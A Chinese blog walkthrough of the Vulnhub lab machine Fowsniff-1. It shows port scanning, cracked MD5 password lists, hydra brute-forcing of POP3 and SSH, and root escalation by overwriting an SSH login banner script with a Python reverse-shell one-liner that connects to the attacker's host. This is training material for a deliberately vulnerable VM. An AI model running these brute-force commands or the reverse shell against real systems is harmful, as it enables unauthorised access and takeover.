【甄选靶场】Vulnhub百个项目渗透——项目五十二:Fowsniff-1(任务挟持)

最新推荐文章于 2024-05-26 03:23:33 发布
最新推荐文章于 2024-05-26 03:23:33 发布
阅读量991 收藏
点赞数
分类专栏: vulnhub百个项目渗透 文章标签: linux ubuntu 服务器 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127506290
版权

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目五十二:Fowsniff-1(任务挟持)

🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月25日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。

信息收集

22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 903566f4c6d295121be8cddeaa4e0323 (RSA)
|   256 539d236734cf0ad55a9a1174bdfdde71 (ECDSA)
|_  256 a28fdbae9e3dc9e6a9ca03b1d71b6683 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Fowsniff Corp - Delivering Solutions
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) TOP USER PIPELINING RESP-CODES AUTH-RESP-CODE UIDL CAPA
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: IDLE ENABLE capabilities AUTH=PLAINA0001 LITERAL+ listed have more post-login Pre-login ID LOGIN-REFERRALS IMAP4rev1 OK SASL-IR

在这里插入图片描述
说明具有用户信息泄漏,并且下面还有一个推特网址,可能跟之前那个打过的油管一样。一会再看,先扫一下目录,发现没有东西,那就扫一下底层
wfuzz -c -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --hc 404 http://192.168.3.151/FUZZ.txt
在这里插入图片描述在这里插入图片描述发现这个文件
获得了几个信息

Fowsniff
B1gN1nj47
pwn3d
1337

1337可能是端口?发现也没有开启新的端口
在这里插入图片描述尝试了几个ssh.pop3都不行,去看了眼推特
好家伙
在这里插入图片描述

https://twitter.com/fowsniffcorp
https://pastebin.com/NrAqVeeX

在这里插入图片描述在这里插入图片描述在这里插入图片描述
获得了这么多密码

统统解密md5

mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

在这里插入图片描述
在这里插入图片描述

mauer@fowsniff:mailcall
mustikka@fowsniff:bilbo101
tegel@fowsniff:apples01
baksteen@fowsniff:skyler22
seina@fowsniff:scoobydoo2
stone@fowsniff:  
mursten@fowsniff:carp4ever
parede@fowsniff:orlando12
sciana@fowsniff:07011972
pop3爆破

ssh也可以爆破一下,只是经验来说ssh直接搞进去了还要pop3干嘛,对吧

hydra pop3://192.168.2.141 -L user.txt -P pass.txt

进去以后

telnet x.x.x.x 110
user xxxx
pass xxxx

查看邮件目录
list 
retr 1

在这里插入图片描述获取了ssh密码

ssh爆破
hydra ssh://192.168.2.141 -L user.txt -p "S1ck3nBluff+secureshell"
爆破出来用户是baksteen

在这里插入图片描述
又一个不知名文件
在这里插入图片描述直接跑linpeas.sh
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述发现这里id很奇怪,出现了权限交叉
在这里插入图片描述
在这里插入图片描述find / -group users 2>/dev/null
找到了这个脚本,一看就是ssh登陆就会调用,那就完事了
直接改掉

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.3.144",1234));os.dup2(s.fileno() ,0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述然后再登陆成功一下,反弹过来了
root
在这里插入图片描述

人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试实战-Fowsniff靶机入侵-附件资源
03-05
渗透测试实战-Fowsniff靶机入侵-附件资源
32个uniapp项目源码 涵盖商城团购等
05-10
源码列表: IT之家小程序版客户端(使用 Mpvue 开发,兼容 Web)ithome-lite-master.zip mpvue 仿网易严选mpvue-shop-master.zip mpvue-音乐播放器mpvue-music-master.zip mpvue性能测试与体验miniweibo-master....
红队打靶:Fowsniff打靶思路详解(vulnhub
Bossfrank的博客
09-20 628
本文是vulnhub靶机Fowsniff的详细打靶过程。涉及到的知识点包括john密码md5破解、hydra密码碰撞、pop3邮件服务器登录、banner脚本提权等。靶机不难,重在思路,这个靶机涉及的剧情感觉还是非常符合实际情景,值得实操盲打!
vuInhub靶场实战系列-DC-5实战
weixin_45221204的博客
05-26 1229
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将介绍dc-5靶机渗透测试,内容包括 nmap扫描、dirsearch目录扫描、文件包含、Burp Suite密码爆破、netcat反弹shell、rpcbind漏洞利用、GNU Screen漏洞利用、sudo提权等内容。
[VulnHub靶机渗透] Fowsniff
人若无名,便可专心练剑
02-17 1085
靶机精讲之Fowsniff靶机,涉及诸多信息收集,比如web信息收集、媒体网站信息收集、工具站信息收集、pop3服务器信息收集,还涉及john和hydra密码暴力破解,crackmapexec密码碰撞,ssh的banner脚本提权等,可以到vulnhub下载靶机边看视频边实操,是一台构思精巧、全面磨练日常渗透技能的的高仿真靶机,非常值得学习。
Vulnhub靶机:FOWSNIFF_ 1
LainWith的博客
03-28 306
Fowsniff(此系列共1台)发布日期:2018 年 9 月 27 日难度:初级运行环境:Virtualbox运行成功目标:取得 root 权限主机发现网站敏感信息泄露POP3、SSH爆破SSH的banner脚本提权。
Fowsniff: 1靶机入侵
weixin_30924087的博客
02-19 501
一、信息收集 1.存活主机扫描 arp-scan-l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018:~# nmap -A192.168.1.13 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 01:18 E...
day01-项目概述、环境搭建
11-03
项目经理负责项目的整体进度和任务分配,产品经理负责需求调研和输出需求文档,UI设计师负责根据产品原型输出界面效果图,架构师负责项目整体架构设计和技术选型,开发工程师负责代码实现,测试工程师负责编写测试...
信息化-项目管理-建筑企业项目管理会计胜任特征模型研究.pdf
07-12
该模型包含五个维度:日常管理工作能力、关系处理能力、组织认知能力、风险控制能力和个人特质,总计22项胜任特征。 这一胜任特征模型的应用主要体现在建筑企业的招聘和甄选、绩效评估等方面。与传统方法相比,使用...
01 尚品甄选-项目概述.md
12-27
01 尚品甄选-项目概述.md
华英杰-东方甄选爆红与社交电商的底层逻辑
最新发布
07-11
华英杰-东方甄选爆红与社交电商的底层逻辑
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
渗透测试实战-Fowsniff靶机入侵
大方子
11-27 3971
机安装/下载 Fowsniff靶机下载:https://pan.baidu.com/s/1dvCJijStPYkeGtoSaLyg7A   Kali的IP地址:192.168.100.8 WIN7的IP地址:192.168.100.9     先用nmap 进行探测 发现目标的IP地址为192.168.100.12 然后在进行靶机端口的探测 先从80端口下手看看 ...
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 8893
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
甄选靶场Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)
人间体佐菲的博客
09-24 855
Vulnhub百个项目渗透——项目二十三:mrRobot-1(文件上传,暴力破解,nmap提权)信息安全,网络安全,渗透测试
vulnhub靶机渗透 DeRPnStiNK_1
RestoreJustice的博客
03-18 271
发现weblog目录,进而找到网站后台,网站使用的cms是WordPress。访问该目录会自动跳转到http://derpnstink.local/weblog/ 我这里可以直接访问,如果有需要的话的绑定host。​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。先在当前用户文件下找。在/Documents找到,derpissues.pcap,拷贝到前面连接一句话木马的蚁剑可访问的目录,用蚁剑下载下来。
vulnhub靶机实战--Matrix:1
清唪的博客
04-13 3554
1.netdiscover 探测靶机ip地址 2.nmap -sS -A -p- +靶机ip 对靶机进行端口服务扫描 3.查看一下80端口网页发现并没有什么卵用 4.dirb http://+靶机ip 目录扫描 发现并没有什么卵用 5.我们上面的端口扫描有个31337端口可以尝试看看它有什么作用 我们来查看它的源代码 发现有base64 耶耶耶~~ 可以解码了 echo “ZWNobyAiVGhlbiB5b3UnbGwgc2VlL...
甄选靶场Vulnhub百个项目渗透——项目十九~二十:Wintermute-Neuromancer-Straylight(smtp突破,LFI利用,内网横向渗透,端口转发)
人间体佐菲的博客
09-22 1150
Wintermute-Neuromancer-Straylight(smtp突破,LFI利用,内网横向渗透,端口转发)网络安全,信息安全,渗透测试
[ vulnhub靶机通关篇 ] vulnhub靶机环境搭建教程并寻找真实IP -- 以DC1为例
qq_51577576的博客
04-09 1343
[ vulnhub靶机通关篇 ] vulnhub靶机环境搭建教程并寻找真实IP -- 以DC1为例
<el-form class="login_form" :model="loginForm" :rules="rules" ref="loginForms"> <h1>Hello</h1> <h2>欢迎来到硅谷甄选</h2> <el-form-item prop="username"> <el-input :prefix-icon="User" v-model="loginForm.username"></el-input> </el-form-item> <el-form-item prop="password"> <el-input type="password" :prefix-icon="Lock" v-model="loginForm.password" show-password></el-input>改写为实注册功能
06-12
需要注意的是,这个模板中的表单项和验证规则都需要与 `registerForm` 和 `rules` 对象相对应。同时,需要在 `data` 选项中定义这两个对象: ``` data() { return { registerForm: { username: '', email: '', ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值